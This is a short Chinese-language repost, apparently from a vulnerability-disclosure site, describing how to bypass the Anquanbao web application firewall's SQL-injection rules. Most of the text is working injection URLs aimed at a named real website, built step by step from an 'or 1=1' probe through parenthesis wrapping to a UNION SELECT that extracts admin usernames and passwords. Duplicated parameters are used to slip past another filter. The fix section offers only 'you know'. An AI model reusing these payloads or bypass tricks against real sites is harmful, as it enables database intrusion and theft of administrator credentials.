在某些web环境下,安全宝对防范sql的部分防护规则可被绕过,继续注入...
http://www.51qljr.com/xinxi/shownews. asp ?id=(-575) or 1=1
简单加个括号 http://www.51qljr.com/xinxi/shownews.asp?id=%28-575%29%20%20or%281%29=%281%29
因此构造 http://www.51qljr.com/xinxi/shownews.asp?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17&id=%2818%29from%28admin%29%29 之所以使用复参 是为了绕过智创那个防护
标准的www.safewaf.com也没有拦截
修复方案: 你懂的
查看更多关于创新工厂安全宝安全防护绕过漏洞 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13813